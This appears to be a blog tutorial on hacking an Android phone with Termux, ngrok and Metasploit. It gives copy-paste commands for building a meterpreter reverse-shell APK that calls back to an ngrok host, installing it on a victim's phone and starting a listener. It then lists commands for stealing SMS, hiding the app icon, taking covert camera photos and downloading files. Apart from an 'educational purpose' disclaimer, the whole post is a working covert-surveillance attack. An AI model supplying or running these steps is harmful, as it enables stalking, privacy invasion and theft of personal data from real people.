How to hack

How to hack

@sudhanshuss

In this post, we are going to learn about how to hack an android phone using termux with Metasploit. You can just copy-paste the commands one by one in termux app and it will work perfectly.


NOTE: This post is only for educational purpose. I and this site do not support any criminal activity. If you are doing any sort of misuse of this information This site is not responsible for that. THIS SITE ONLY SUPPORT ETHICAL HACKING.


Requirements:


  1. Termux: If you wanna know about termux in Detail [What is termux? | Download termux in 2020]
  2. Metasploit: If you don't have Metasploit in your Termux[Install Metasploit in termux 2020]



Port Forwarding using Ngrok in termux:

If you wanna use Metasploit on LAN then you can skip this step(if you and your victim is connected to same wifi then you can skip this step).


By the help of port forwarding, we can access the victim's phone by using mobile data which means if you are using Simcard then you have to do port forwarding to use Metasploit.


Step 1:

Go to Ngrok.com and create an account.if you already have an account at negrok then log in.





Step 2:

Download the Ngrok zip file on your phone.It will be approx 12Mb file.





Step 3:

Now you will see a zip file that you have downloaded from the Ngrok website.

Open termux and navigate to that zip file. If it's not in your download folder or you can't see your download folder , just open file manager and paste the zip file in your internal storage.and go to termux and cd storage.





Step 4:

Type this command to copy the zip file in your Home directory of termux.

 cp ngrok-stable-linux-arm.zip /$HOME




Step 5:

Type this command to go back to your home directoty.

 cd /$HOME



Step 6:

Type this command to unzip the file.

 unzip ngrok-stable-linux-arm.zip





Step 7:

Go to Ngrok site again and copy the token,(please copy the full token)





Step 8:

Open terminal and type this code and paste your token and press enter.

 ./ngrok authtoken 





Step 9:

Type this command to start port forwarding on port 1275.

 ./ngrok tcp 1275

You can use any port number i am using 1275 here.





Step 10:

If you are also getting this error just open your hotspot and it will be fixed in 30 to 60 seconds.






Create payload in Metasploit:

The payload will be an apk file which we are going to install on the victim's phone. That will allow us to Acess the victim's android phone.


Step 1:

Open a new session in termux (just swipe your screen from left to right and click on new session).

please make sure the termux have storage permission.




 termux-setup-storage

Allow storage permission.



Step 2:

Type this command to create a payload and press Enter.


Please change your LHOST and LPORT as given in the below image.



 msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk




 Step 3:

Go to your internal storage and you will see Android.apk.

Install this apk in the victim's phone.





Start Listener (msfconsole): 

Step 1:

Type this command in termux window to start the msfconsole.

 msfconsole

It can take upto 30 sec to start.





Step 2:

Type this command.

 use exploit/multi/handler





Step 3:

Type this command to set the payload.

 set payload android/meterpreter/reverse_tcp 




Step 4:

Now set the LHOST at which you wanna listen to the session.

If you are using ngrok port forwarding then enter this IP address but if you are not using port forwarding then enter your Local IP.

 set LHOST 127.0.0.1





Step 5:

Now set the LPORT.

if you are using Ngrok then set the same port which you used while port forwarding.

if you are not using port forwarding then just enter the same port you used to create the payload.

 set LPORT 1275 




Step 6:

This is the last command and the phone will be Hacked.

 exploit.

It will connect to the victim and give you meterpreter session.





Some useful commands in Meterpreter.

Find all the commands available:

this command will give you a list of commands and a short description of that command.

 help 





Get SMS from victim's phone to your phone:

This command will give you the most recent 50 SMS from the victim,'s phone.

 dump_sms

You will get a text file that contains all the SMS with details just use cat command to open the file.





Hide the icon of the Apk you send to the victim:

If you are installing an app on the victim's phones then it obvious that the victim gonna notice that app and chances are the victim will uninstall the app.by using the below command you can hide the app icon from the victim's phone.

 hide_app_icon



Change the audio mode of the victim's phone:

you can set the phone on the general mode by using the below command.

 set_audio_mode -m 1

you can type set_audio_mode -m 0 to silent the phone.



Capture pictures from the victim's phone:

This command will capture a photo from the victim's camera and send it to your storage folder.

 webcam_snap



 Access file storage of the victims:

You can navigate to the victim's file and see all the data in any folder.

 cd /sdcard

you can type ls command to show directories if you wanna know about the basic commands of termux read this post.



Download any file from the victim's phone:

navigate to the file you wanna download and type this command

 download file-name



Report Page